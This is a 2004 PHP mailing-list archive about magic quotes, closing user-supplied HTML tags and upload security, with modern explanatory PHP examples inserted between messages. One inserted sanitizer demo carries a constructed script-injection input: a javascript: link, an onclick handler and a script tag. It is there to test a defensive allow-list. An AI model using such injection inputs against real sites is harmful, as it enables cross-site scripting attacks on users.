> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
> 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
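The closest PHP itself gets to Warren's whois idea, as an added example that is not code from the thread: a reverse DNS lookup on the client address, whose PTR name usually carries the provider's domain. The helper name is constructed, and two caveats are built in: only `$_SERVER['REMOTE_ADDR']` (the TCP peer) is used, since headers such as X-Forwarded-For are set by the client and cannot be trusted for this, and the result is a hint only, because whoever controls the reverse zone chooses the PTR name.

```php
<?php
// Added example, not from the thread: guess a provider from the client's
// reverse DNS name. Works offline with the loopback address.
function guessProviderDomain(string $ip): ?string
{
    // refuse anything that is not an IP literal before it reaches the resolver
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    // PTR lookup; gethostbyaddr() returns the unchanged IP when there is no PTR
    $host = gethostbyaddr($ip);
    if ($host === false || $host === $ip) {
        return null;
    }
    // crude heuristic: keep the last two labels as the provider hint
    // (wrong for names under co.uk-style suffixes, which is why this is a hint)
    $labels = explode('.', $host);
    return count($labels) >= 2 ? implode('.', array_slice($labels, -2)) : $host;
}

// REMOTE_ADDR is the peer the web server accepted the connection from; on the
// command line it is absent, so the loopback address stands in for the demo
$ip = $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1';
echo guessProviderDomain($ip) ?? "no reverse name for $ip", "\n";
```

Behind a reverse proxy REMOTE_ADDR is the proxy, and the only safe way to see further is a forwarded-address header that the proxy itself overwrites; anything the client can send unchanged is not evidence of anything.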



[PHP] Forms In PHP

2004-12-09 Thread Wil Hitchman
Hi, 

I created a web form in PHP and used a couple of email addresses.  The only 
email address that worked when I submitted to the form (for testing purposes) 
was my Yahoo address.  My AOL, hotmail and other work addresses did not work.  
Can someone tell me why?

Thanks, 

Wil

[PHP] Re: How to post quote/double quote mark?

2004-12-09 Thread Shen Kong
Hi, because your magic_quotes_gpc = on, so, do this:
$A = stripslashes($_POST['A']);
here is a function I use , maybe useful for you:
function returnInfo($info) {
    if (!get_magic_quotes_gpc()) {
        // magic quotes off: just trim and escape
        if (is_array($info)) {
            $info = array_map("trim", $info);
            return array_map("htmlspecialchars", $info);
        } else {
            return htmlspecialchars(trim($info));
        }
    } else {
        // magic quotes on: additionally remove the backslashes PHP added
        if (is_array($info)) {
            $info = array_map("trim", $info);
            $info = array_map("htmlspecialchars", $info);
            return array_map("stripslashes", $info);
        } else {
            return stripslashes(htmlspecialchars(trim($info)));
        }
    }
}
Minghua Yao wrote:
Hi, 

I used the following function to post a string variable "abcdef" to a PHP program on another host: 

<?php
function PostToHost($host, $path, $data_to_send) {
    $fp = fsockopen($host, 80);

    if (!$fp) {
        echo "Failed to open port";
        exit;
    }

    // HTTP header lines end in CRLF; a blank line separates headers from body,
    // and the body must be exactly Content-length bytes long
    fputs($fp, "POST $path HTTP/1.1\r\n");
    fputs($fp, "Host: $host\r\n");
    fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
    fputs($fp, "Content-length: " . strlen($data_to_send) . "\r\n");
    fputs($fp, "Connection: close\r\n\r\n");
    fputs($fp, $data_to_send);

    $res = "";
    while (!feof($fp)) {
        $res .= fgets($fp, 128);
    }

    fclose($fp);
    return $res;
}

$x = "A = \"abcdef\"";
$y = PostToHost("host/name", "/path/to/test.php", $x);
echo $y;
?>
"/path/to/test.php" on "host/name" is as follows.

<?php
echo $_POST['A']; 
?>

It seemed that test.php got \"abcdef\", instead of "abcdef". Could anyone please tell me 
how to pass "abcdef" to test.php?
Thanks in advance.
-Minghua



--
-- ShenKong ([EMAIL PROTECTED])
-- http://www.openphp.cn
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
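Both halves of Minghua's round trip fixed, as an added example that is not Minghua's or Shen's code. Two things go wrong in the original: the POST body is not URL-encoded, which application/x-www-form-urlencoded requires, and the receiving side keeps whatever magic_quotes_gpc added. The builder below encodes with http_build_query(); the `rawInput` helper (a constructed name) undoes magic quotes once, at the edge, so the script sees the literal text whether the setting is on or off. The host and path are the ones from the thread and are placeholders; the round trip is simulated locally with parse_str(), which is what PHP does to build $_POST.

```php
<?php
// Added example, not code from the thread: a well-formed POST body and a
// receiver that normalises input once instead of guessing per field.

/** Client side: the request text a fsockopen()-style sender would write. */
function buildPostRequest(string $host, string $path, array $fields): string
{
    $body = http_build_query($fields);           // quotes become %22, spaces become +
    return "POST $path HTTP/1.1\r\n"
         . "Host: $host\r\n"
         . "Content-Type: application/x-www-form-urlencoded\r\n"
         . "Content-Length: " . strlen($body) . "\r\n"
         . "Connection: close\r\n\r\n"
         . $body;
}

/** Receiver side: undo magic quotes once, at the edge, and nowhere else. */
function rawInput($value)
{
    if (is_array($value)) {
        return array_map('rawInput', $value);
    }
    // magic_quotes_gpc was removed in PHP 5.4 and get_magic_quotes_gpc() in
    // PHP 8, so guard the call; on a current PHP only the "off" branch runs
    $magic = function_exists('get_magic_quotes_gpc') && @get_magic_quotes_gpc();
    return $magic ? stripslashes($value) : $value;
}

// constructed round trip: what test.php would see in $_POST for this body
$request = buildPostRequest('host/name', '/path/to/test.php', ['A' => '"abcdef"']);
$body    = substr($request, strpos($request, "\r\n\r\n") + 4);
parse_str($body, $received);                     // PHP builds $_POST the same way

$a = rawInput($received['A']);
echo $a, "\n";                                   // the value as the client sent it
echo htmlspecialchars($a, ENT_QUOTES, 'UTF-8'), "\n";   // the value when put into HTML
```

One design point that differs from Shen's returnInfo(): htmlspecialchars() is applied only where the value is written into HTML, not when it is read. Escaping on input bakes HTML encoding into data that may later go to MySQL, a mail, or a JSON response, each of which needs a different escape.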


Re: [PHP] Close all open tags in HTML text

2004-12-09 Thread Matt Palermo
 I would like to leave any HTML in there, but just make sure that ending 
tags exist, so it doesn't screw up the rest of the page.  Strip tags would 
just wipe out the HTML rather than allowing it and ending it safely.


"Richard Lynch" <[EMAIL PROTECTED]> wrote in message 
news:[EMAIL PROTECTED]
> Matt Palermo wrote:
>> I am allowing users to imput HTML code into a textarea.  After they input
>> this, I wany to output their HTML to the browser.  In order for the
>> document
>> to be safe, I need to close all open HTML tags that have been left open 
>> by
>> the user, along with any open comments.  Is there a way to take an HTML
>> string and add closing tags and comments to it if needed?
>
> After you use http://php.net/tidy to fix the HTML, use
> http://php.net/strip_tags to rip out all but the handful of tags you
> really want to allow them to use, most especially any JavaScript they
> might shove in to attack your (and my!) server.
>
> I *think* strip_tags rips out JavaScript.   RTFM to be sure.
>
> -- 
> Like Music?
> http://l-i-e.com/artists.htm 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
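A way to do what Matt asks (close whatever the user left open) and what Richard recommends (keep only a handful of tags) in one pass, as an added example that is not code from either of them. It uses DOMDocument, which is built on libxml, rather than the tidy extension: libxml closes unclosed tags and comments while parsing, and the walk afterwards keeps only an allow-list of tags and attributes. That second step is the reason strip_tags() alone is not enough: strip_tags keeps every attribute, onclick= included, on the tags it is told to allow. The allow-lists and the sample input are constructed here.

```php
<?php
// Added example, not from the thread: repair and allow-list user HTML with
// DOMDocument. Unclosed tags and comments are closed by the parser; the walk
// below removes every element and attribute that is not explicitly allowed.

const ALLOWED_TAGS  = ['p', 'b', 'i', 'em', 'strong', 'a', 'ul', 'ol', 'li', 'br'];
const ALLOWED_ATTRS = ['a' => ['href']];

function sanitizeHtml(string $input): string
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);            // user markup is expected to be broken
    // the xml prolog forces UTF-8; the body wrapper gives the fragment one root
    $doc->loadHTML('<?xml encoding="UTF-8"?><body>' . $input . '</body>');
    libxml_clear_errors();

    $body = $doc->getElementsByTagName('body')->item(0);
    cleanNode($body);

    $out = '';
    foreach ($body->childNodes as $child) {
        $out .= $doc->saveHTML($child);          // serialise the repaired children only
    }
    return $out;
}

function cleanNode(DOMNode $node): void
{
    // iterate over a static copy: removing children from a live list skips nodes
    foreach (iterator_to_array($node->childNodes, false) as $child) {
        if ($child instanceof DOMComment) {
            $node->removeChild($child);          // comments, closed or not, never reach output
        } elseif ($child instanceof DOMElement) {
            $tag = strtolower($child->tagName);
            if (!in_array($tag, ALLOWED_TAGS, true)) {
                if (in_array($tag, ['script', 'style'], true)) {
                    $node->removeChild($child);  // content of these is code, drop it whole
                } else {
                    cleanNode($child);           // unwrap: keep the visible text, lose the tag
                    while ($child->firstChild) {
                        $node->insertBefore($child->firstChild, $child);
                    }
                    $node->removeChild($child);
                }
                continue;
            }
            foreach (iterator_to_array($child->attributes, false) as $attr) {
                $name = strtolower($attr->name);
                $ok = in_array($name, ALLOWED_ATTRS[$tag] ?? [], true);
                // even an allowed href must use a scheme from a fixed list
                if ($ok && $name === 'href'
                    && !preg_match('#\A(https?://|mailto:|/)#i', trim($attr->value))) {
                    $ok = false;
                }
                if (!$ok) {
                    $child->removeAttribute($attr->name);
                }
            }
            cleanNode($child);
        }
    }
}

// constructed input: unclosed <b> and <i>, an event handler, a scripted link,
// a script element and a comment that is never closed
$userHtml = '<p>Hello <b>world<i>!</p>'
          . '<a href="javascript:doSomething()" onclick="doSomething()">link</a>'
          . '<script>doSomething()</script>'
          . '<!-- never closed';
echo sanitizeHtml($userHtml), "\n";
```

Everything the allow-list does not name is removed, so adding a tag or attribute later is a deliberate decision rather than a forgotten exception; a deny-list built from strip_tags() works the other way round and has to anticipate every attribute and scheme a browser might act on.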



Re[2]: [PHP] How do you work this thing

2004-12-09 Thread Tom Rogers
Hi,

Friday, December 10, 2004, 11:05:50 AM, you wrote:


RC> No, no, no, we want to keep the earth clean... a dynamo and pedals ought
RC> to give him an unlimited renewable energy source.


Maybe he has one with pedals and that's what he can't get to work?

-- 
regards,
Tom

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Re: PHP Security

2004-12-09 Thread Chris Shiflett
--- I l <[EMAIL PROTECTED]> wrote:
> the best security practice is to store the jpg file or any other
> uploaded file in your mySql database. This way you never have
> to worry about someone executing php by the url like
> www.example.com/pic.jpg. To view the file, the user would type
> www.example.com/veiw.php?fileID=3425433345.

That's the best? :-)

While I have a great deal of confidence in my code as well, I find it odd
that you trust your own PHP code more than something like Apache, which
has been tested by millions of people worldwide and is very mature.

I would argue that it's more likely that you'll make a mistake in view.php
than it is that you will misconfigure Apache to process images as PHP.

Security is all about knowing what you can trust and what you cannot. A
mistrust of everything (paranoid security) is not a good solution, and
when there is a choice, the one with less risk is more secure. In this
case, I don't agree with your decision. I would put my trust in Apache.

> I can't really see any security problems here.

There are security concerns with everything, even if they're hypothetical
(e.g., even when you can't discover an exploit). Be careful not to ever
get too comfortable. :-)

Chris

=
Chris Shiflett - http://shiflett.org/

PHP Security - O'Reilly HTTP Developer's Handbook - Sams
Coming Soon http://httphandbook.org/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
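A middle ground between the two positions above, as an added example that is not code from the thread: uploads stay in the filesystem (Chris's point, let Apache serve bytes), but the "pic.jpg runs as PHP" risk is removed by construction. Files go outside the web root under a random id with a server-chosen extension, the content is checked with finfo rather than the client-supplied type, and the view script looks up the id and streams the file with an explicit Content-Type. The storage directory, the `storeUpload`/`serveUpload` names and the form field name are constructed here; the id is what the database row (uploader IP, date, owner) would reference.

```php
<?php
// Added example, not code from the thread: store uploads so that nothing
// under the document root can ever be executed, and serve them by id.

define('UPLOAD_DIR', '/var/app/uploads');       // hypothetical directory outside DocumentRoot

const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/** Validate one $_FILES entry and move it into UPLOAD_DIR; returns the new id. */
function storeUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with code ' . ($file['error'] ?? 'none'));
    }
    // sniff the real content; $file['type'] and $file['name'] come from the
    // client and are never used for any decision
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_IMAGE_TYPES[$mime])) {
        throw new RuntimeException("unsupported content type $mime");
    }
    if (@getimagesize($file['tmp_name']) === false) {   // second opinion: does it decode?
        throw new RuntimeException('file is not a valid image');
    }
    // random id plus a server-chosen extension: no user text reaches the path
    $id   = bin2hex(random_bytes(16));
    $dest = UPLOAD_DIR . '/' . $id . '.' . ALLOWED_IMAGE_TYPES[$mime];
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store upload');
    }
    return $id;
}

/** view.php: resolve an id (never a filename) and stream with safe headers. */
function serveUpload(string $id): void
{
    if (!preg_match('/\A[0-9a-f]{32}\z/', $id)) {      // anything else is not an id
        http_response_code(404);
        return;
    }
    foreach (ALLOWED_IMAGE_TYPES as $mime => $ext) {
        $path = UPLOAD_DIR . "/$id.$ext";
        if (is_file($path)) {
            header('Content-Type: ' . $mime);
            header('X-Content-Type-Options: nosniff');  // browser must not re-sniff as HTML
            header('Content-Disposition: inline; filename="' . $id . '.' . $ext . '"');
            header('Content-Length: ' . filesize($path));
            readfile($path);
            return;
        }
    }
    http_response_code(404);
}

// usage in the upload handler and in view.php respectively (form field and
// query parameter names are constructed):
//   $id = storeUpload($_FILES['picture']);   // then INSERT $id, uploader IP, date into MySQL
//   serveUpload($_GET['fileID'] ?? '');
```

The database still holds the metadata "I l" wanted (who uploaded what, and when), but the bytes never sit where a URL maps to them, so the question of whether Apache would execute them does not arise. As defence in depth, the same directory can additionally be kept non-executable at the web server level if it is ever moved under the document root.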



[PHP] I'm Back i'm beginner and i couldn't solve the problem

2004-12-09 Thread Mecnun
hi again, I tried all the corrections that you showed me. Nothing worked and I 
uploaded my scripts to a web hosting server and I saw that my scripts run on 
that server quite well. 
Every script works on my machine, if I don't use $_POST[].
 
For example if I try to run that code:
 
'; 
echo 'Arnol said that: "I\'ll be back"';
?>
 
It runs, there is no problem, but if I run that one:
 
 $_POST[user]  \n\n";
print "Your address is:\n\n  $_POST[address] ";
?>
 
Only "Welcome" and "Your address is" are printed. 
The data that I enter into the form is not received.
Do you have any idea, what kind of configuration mistake that I've done?


-
Do you Yahoo!?
 Read only the mail you want - Yahoo! Mail SpamGuard.

Re: [PHP] I'm Back i'm beginner and i couldn't solve the problem

2004-12-09 Thread Santa
In the message of Friday 10 December 2004 05:57, Mecnun wrote:

hint -> php.ini -> register_globals = Off

